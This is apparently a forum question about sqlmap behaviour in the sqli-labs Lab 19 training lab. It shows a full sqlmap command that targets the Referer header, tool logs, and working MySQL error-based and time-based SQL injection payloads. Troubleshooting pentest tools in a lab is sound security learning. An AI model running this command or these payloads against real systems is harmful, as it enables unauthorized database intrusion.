In accordance with the sqlmap usage documentation, I am attempting to utilize the * symbol as an injection point to conduct a SQL injection attack using sqlmap. Specifically, I am testing this approach on a vulnerable lab, Lab19 within sqli-labs.
Within this lab, there is a Referer-vulnerable header. My sqlmap run command is as follows:
sqlmap \
--method=POST \
--batch \
--flush-session \
--fresh-queries \
--banner \
--risk=3 \
--level=5 \
--drop-set-cookie \
--results-file=/dev/null \
--ignore-code=* \
--skip-waf \
--har=remotelabs.har \
-H 'Referer: https://sqli-labs-domain.app*' \
--answers=follow=Y,inside=Y,continue=Y,those=N,non-custom=N \
-u "https://sqli-labs-domain.app/Less-19/" \
--data 'uname=admin&passwd=admin&submit=Submit'
In some cases, the execution proceeds rather quickly (around 1600 requests) and successfully identifies a vulnerability:
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: ' AND EXTRACTVALUE(6954,CONCAT(0x5c,0x7171706271,(SELECT (ELT(6954=6954,1))),0x716b707671)) AND 'FjuT'='FjuT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 5593 FROM (SELECT(SLEEP(30)))ZeqH) AND 'OMvC'='OMvC
---
However, sometimes, it considers it as a false positive and continues attacking other parameters that were not marked for injection:
[21:55:00] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
...
[22:03:07] [WARNING] false positive or unexploitable injection point detected
[22:03:07] [WARNING] (custom) HEADER parameter 'Referer #1*' does not seem to be injectable
...
[22:03:07] [INFO] testing if POST parameter 'uname' is dynamic
[22:03:08] [INFO] POST parameter 'uname' appears to be dynamic
[22:03:08] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:03:08] [INFO] testing for SQL injection on POST parameter 'uname'
[22:03:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
...
After a long duration (over 10,000 requests), it eventually fails with:
[23:37:08] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
I suspect that the consideration of the Referer as a false positive may be due to unstable target behavior. However, I am confused as to why sqlmap is attacking parameters that were not marked as injection points (*). Is this behavior expected, or could it be a bug? If it is expected behavior, how can I prevent sqlmap from attacking non-marked parameters?